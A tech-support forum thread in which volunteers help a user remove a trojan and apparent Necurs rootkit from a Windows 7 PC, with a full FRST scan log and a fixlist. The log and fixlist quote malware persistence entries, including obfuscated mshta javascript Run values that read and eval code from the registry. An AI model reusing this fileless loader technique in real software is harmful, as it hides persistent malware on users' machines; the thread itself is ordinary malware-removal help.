[SOLVED] Arte,is Trojan

O

ot008239

Contributor
Joined
Jul 17, 2015
Posts
27
McAfee All Access reported Artemis Trojan, a number of files were quarantined then deleted, subsequent days Firewall and on-line scans started failing intermittently then stopped.


PC does not boot into windows, basically locked in loop of reporting corrupted system files, scans run then report unable to fix issues.


I have run SFC \scannow numerous times, I have also run SFCfix report attached.
 

Attachments

Hi, ot008239.

Please download MiniToolBox, save it to your desktop and run it.

Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices
  • List Users, Partitions and Memory size.
  • List Minidump Files
Click Go and copy/paste the (do not attach) results (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.

Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

Following that, please follow the instructions at Malware Removal Posting Instructions and provide the requested logs.
 
Re: Artemis Trojan

Sadly my PC doesn't boot in any Safe Modes, locked into a cycle for automatic repair, which fails.


From Startup Repair
Root cause found

Boot critical file c:\windows\system32\drivers\8b66cd9be5c7a4f2.sys is corrupt
 
Last edited:
Hi, ot008239. Let's give this a try:

  • Download FRST to a USB flash drive.
  • Download FRST64 to a USB flash drive.
  • Plug the USB drive into the infected machine.

Boot your computer into Recovery Environment

  • Restart the computer and press F8 repeatedly until the Advanced Options Menu appears.
  • Select Repair your computer.
  • Select Language and click Next
  • Enter password (if necessary) and click OK, you should now see the screen below ...

W7InstallDisk2.png


  • Select the Command Prompt option.
  • A command window will open.
    • Type notepad then hit Enter.
    • Notepad will open.
      • Click File > Open then select Computer.
      • Note down the drive letter for your USB Drive.
      • Close Notepad.
  • Back in the command window ....
    • Type e:/frst.exe and hit Enter (where e: is replaced by the drive letter for your USB drive)
    • Type e:/frst64.exe and hit Enter (where e: is replaced by the drive letter for your USB drive)
    • FRST will start to run.
      • When the tool opens click Yes to disclaimer.
      • Press Scan button.
      • When finished scanning it will make a log FRST.txt on the flash drive.
  • Close the command window.
  • Boot back into normal mode and post me the FRST.txt log please.
 
Followed the instructions but get the message below even though I can change to the USB drive and files are visible in notepad and command line

The Subsystem needed to support the image type is not present
 
Since SFC didn't fix the problem, see if Repair will.

As before, Boot your computer into Recovery Environment

  • Restart the computer and press F8 repeatedly until the Advanced Options Menu appears.
  • Select Repair your computer.
  • Select Language and click Next
  • Enter password (if necessary) and click OK, you should now see the screen below ...

W7InstallDisk2.png


This time, select Startup Repair. Note: Startup repair sometimes takes three times. The first time you run it, it attempts to repair any system level corruption via SFC /SCANNOW. The second time it runs, it checks the hard disk for bad sectors and a corrupted file system. This is usually the longer of the three runs. The third time it runs, it tries to use a system restore point to replace a possibly damaged registry.

Since it is unknown whether the problem was caused by McAfee or something else, if you have the opportunity to select a restore point, I suggest using a date prior to McAfee removing the files as the trojan identified a number of years old. The main thing is to see if we can get your computer up and running again and then we'll deal with any infection.
 
System retores have been unsuccessful. I have Dell DataSafe with an option to reset back to factory defaults but without affecting data, are you familiar with this feature?
 
I've seen that it is a Dell feature but have never used a Dell computer. Since it will reset to factory defaults, you may want to try a very nice recovery Linux LiveCD called Trinity Rescue Kit to retrieve files from dead/dying/infected computers, and to also do some virus scanning as well as removing passwords, etc. You can get it from here: Trinity Rescue Kit.

In the meantime, I'll ask if anyone has any other suggestions for you to try first. Another member and I believe that the 8b66cd9be5c7a4f2.sys driver is malware and tied to the problem.
 
Here's a question first. A member of the team (thanks, BrianDrab) wonders if perhaps you inadvertently tried to use the wrong version of FRST. With a 64-bit operating system, you need to use FRST 64. If you used the wrong version, please try the instructions from post #43 above again to use the Farbar Recovery Scan Tool.

A quick repost of the instructions:

Please download Farbar Recovery Scan Tool and save it to a flash drive.

Plug the flash drive into the infected PC.

Enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Choose your language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account an click Next.

On the System Recovery Options menu you will get the following options:
Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst.exe (for x64 bit version type e:\frst64) and press Enter
    Note: Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Output from frst64


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:20-07-2015
Ran by SYSTEM on MININT-J3UB2EQ on 24-07-2015 11:40:37
Running from C:\
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Recovery
The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Stage Remote] => C:\Program Files (x86)\Dell\Stage Remote\StageRemote.exe [2022976 2011-06-27] ()
HKLM\...\Run: [boinctray] => C:\Program Files\BOINC\boinctray.exe [68928 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [boincmgr] => C:\Program Files\BOINC\boincmgr.exe [8926016 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-06] (Apple Inc.)
HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)
HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-04-07] (McAfee, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-24] (Sonic Solutions)
HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()
HKLM-x32\...\Run: [AccuWeatherWidget] => C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe [968048 2012-02-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [719272 2015-04-02] (McAfee, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [335232 2015-04-10] (Oracle Corporation)
HKLM\...\RunOnce: [*Restore] => C:\Windows\system32\rstrui.exe [296960 2015-05-25] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\Orrin JNR\...\Run: [Google Update] => C:\Users\Orrin JNR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-07-15] (Google Inc.)
HKU\Thomas\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-16] (Skype Technologies S.A.)
HKU\Thomas\...\Run: [Amazon Music] => C:\Users\Thomas\AppData\Local\Amazon Music\Amazon Music Helper.exe [6277952 2014-12-07] ()
HKU\Thomas\...\Run: [OneDrive] => C:\Users\Thomas\AppData\Local\Microsoft\OneDrive\OneDrive.exe [382664 2015-05-22] (Microsoft Corporation)
HKU\Thomas\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\Thomas\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-18] (Microsoft Corporation)
S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
S2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [753768 2015-04-07] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.450.0\McCSPServiceHost.exe [207344 2015-04-08] (McAfee, Inc.)
S2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [612688 2015-04-09] (McAfee, Inc.)
S2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-02-17] (McAfee, Inc.)
S2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [372144 2015-04-06] (McAfee, Inc.)
S2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-02-17] (McAfee, Inc.)
S2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-03-27] (McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [401736 2015-02-17] (McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [337888 2015-02-17] (McAfee, Inc.)
S0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-02-17] (McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-02-17] (McAfee, Inc.)
S0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864072 2015-02-17] (McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [482600 2015-01-15] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-01-15] (McAfee, Inc.)
S0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [340448 2015-02-17] (McAfee, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-01-03] (Duplex Secure Ltd.)
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-24 11:40 - 2015-07-24 11:40 - 00000000 _____ C:\FRST.txt
2015-07-24 11:36 - 2015-07-24 11:40 - 00000000 ____D C:\FRST
2015-07-23 01:37 - 2015-07-23 01:37 - 02135552 _____ (Farbar) C:\frst64.exe
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-21 12:29 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Desktop\SFCFix.zip
2015-07-21 12:24 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Downloads\SFCFix.zip
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-17 14:37 - 2015-07-21 12:51 - 00000000 ____D C:\Users\Thomas\AppData\Local\niemiro
2015-07-17 05:03 - 2015-07-17 05:03 - 00000387 _____ C:\Users\Thomas\Desktop\copy.txt
2015-07-17 04:56 - 2015-07-17 04:57 - 00000000 ____D C:\Users\Thomas\copy
2015-07-17 04:55 - 2015-07-17 04:55 - 00000000 ____D C:\Users\Thomas\Downloads\Copy
2015-07-17 03:11 - 2015-07-21 12:51 - 00003148 _____ C:\Users\Thomas\Desktop\SFCFix.txt
2015-07-17 03:11 - 2015-07-21 12:51 - 00000000 ____D C:\SFCFix
2015-07-17 02:50 - 2015-07-17 02:55 - 00003212 _____ C:\Users\Thomas\sfcdetails.txt
2015-07-15 23:06 - 2015-07-15 23:06 - 00000000 ____D C:\Quarantine
2015-07-15 22:56 - 2015-07-17 03:37 - 00000000 ____D C:\Program Files (x86)\stinger
2015-07-15 22:55 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\Downloads\stinger32-epo
2015-07-15 13:35 - 2015-07-15 13:35 - 00000000 ____D C:\Users\Thomas\Desktop\McAfee File Lock
2015-07-15 12:14 - 2015-07-15 13:18 - 00095802 _____ C:\Users\Thomas\Desktop\sfcdetails.txt
2015-07-15 11:58 - 2015-07-15 11:58 - 00000000 ____D C:\Users\Thomas\McAfee File Lock
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:26 - 2015-07-14 03:26 - 00000342 _____ C:\Windows\PFRO.log
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 12:45 - 2015-07-14 03:26 - 00000112 _____ C:\Windows\setupact.log
2015-07-13 12:45 - 2015-07-13 12:45 - 00000000 _____ C:\Windows\setuperr.log
2015-07-13 12:16 - 2015-07-13 12:16 - 00000000 ____D C:\Windows\System32\McAfee File Lock
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-07-03 06:35 - 2015-07-12 10:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-28 10:52 - 2015-06-29 01:12 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\ProgramData\Desktop\VLC media player.lnk
2015-06-28 10:49 - 2015-06-28 10:49 - 28849904 _____ C:\Users\Thomas\Downloads\vlc-2.2.1-win32.exe
2015-06-28 10:49 - 2015-06-28 10:49 - 00000000 ____D C:\Program Files (x86)\VideoLAN
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-23 23:28 - 2014-12-09 19:22 - 00000000 ____D C:\Windows\System32\appraiser
2015-07-23 23:28 - 2014-08-09 05:12 - 00000000 ____D C:\users\Guest
2015-07-23 23:28 - 2014-05-06 18:00 - 00000000 ___SD C:\Windows\System32\CompatTel
2015-07-23 23:28 - 2012-07-15 07:50 - 00000000 ____D C:\users\Orrin JNR
2015-07-23 23:28 - 2012-05-08 08:58 - 00000000 ____D C:\users\Thomas
2015-07-23 23:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\servicing
2015-07-23 23:27 - 2015-05-15 23:52 - 00000000 __RSD C:\Users\Thomas\Documents\McAfee Vaults
2015-07-23 23:27 - 2015-04-04 18:00 - 00000000 ___SD C:\Windows\System32\GWX
2015-07-23 23:27 - 2014-05-14 11:23 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Skype
2015-07-23 23:27 - 2012-11-29 11:21 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\uTorrent
2015-07-23 23:27 - 2012-05-09 12:20 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-23 23:27 - 2012-05-01 03:52 - 00000000 ____D C:\Program Files (x86)\Dell DataSafe Local Backup
2015-07-23 23:25 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
2015-07-23 23:23 - 2012-05-08 09:19 - 00000000 ____D C:\ProgramData\BOINC
2015-07-23 23:22 - 2015-04-04 02:39 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-07-23 23:22 - 2012-05-01 04:08 - 00000000 ____D C:\Program Files\mcafee
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default\AppData\Local\SoftThinks
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default User\AppData\Local\SoftThinks
2015-07-22 10:05 - 2013-10-23 06:27 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-07-21 12:57 - 2012-05-01 04:15 - 00000000 ____D C:\ProgramData\Sonic
2015-07-15 19:47 - 2010-11-20 23:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-07-14 14:58 - 2012-05-08 09:00 - 00000422 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2015-07-14 14:17 - 2013-03-28 13:55 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-14 14:06 - 2012-09-02 09:09 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-14 13:17 - 2013-03-28 13:55 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 13:17 - 2012-05-01 03:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 13:17 - 2012-05-01 03:35 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-14 12:49 - 2012-07-15 12:24 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3274687172-3602840966-2228239552-1006Core.job
2015-07-14 09:06 - 2012-09-02 09:09 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:26 - 2009-07-13 21:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-14 03:26 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-13 19:42 - 2015-04-04 02:44 - 00004978 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for trustno1-Thomas trustno1
2015-07-13 12:46 - 2012-12-22 03:26 - 00000000 ___RD C:\Users\Thomas\SkyDrive
2015-07-13 10:53 - 2015-05-15 23:49 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-13 10:53 - 2014-08-21 12:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-13 05:00 - 2012-05-09 05:00 - 00003488 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2015-07-13 05:00 - 2012-05-08 09:00 - 00003450 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2015-07-12 09:07 - 2009-07-13 21:13 - 00006506 _____ C:\Windows\System32\PerfStringBackup.INI
2015-07-12 09:00 - 2012-05-08 09:00 - 00000564 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2015-07-12 08:47 - 2014-11-12 00:47 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieBrowserModeList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieUserList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieSiteList
2015-07-04 19:00 - 2012-05-08 09:00 - 00004268 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2015-07-02 12:51 - 2009-07-13 21:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2015-06-26 03:30 - 2014-11-09 11:44 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-06-26 03:30 - 2012-05-01 03:54 - 00000000 ____D C:\ProgramData\Skype
Files to move or delete:
====================
C:\ProgramData\msrllq.exe

==================== Known DLLs (Whitelisted) ================

==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
==================== Restore Points =========================
Restore point made on: 2015-07-14 15:00:12
==================== Memory info ===========================
Percentage of memory in use: 10%
Total physical RAM: 8104.63 MB
Available physical RAM: 7220.89 MB
Total Virtual: 8102.83 MB
Available Virtual: 7193.83 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:450.91 GB) (Free:145.58 GB) NTFS
Drive g: (RECOVERY) (Fixed) (Total:14.81 GB) (Free:5.74 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: ACEA298C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.9 GB) - (Type=07 NTFS)

LastRegBack: 2015-07-14 03:56
==================== End of log ============================
 
That is one nasty infection on your computer. It is important for you to note up front that this family of malware works together to download other malware and can also give a malicious hacker backdoor access and control of your PC. I'll do my best to help you clean your computer.

  • Click Start
  • Type notepad.exe in the search programs and files box and click Enter.
  • A blank Notepad page should open.
  • Copy/Paste the contents of the code box below into Notepad.
Code: 
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
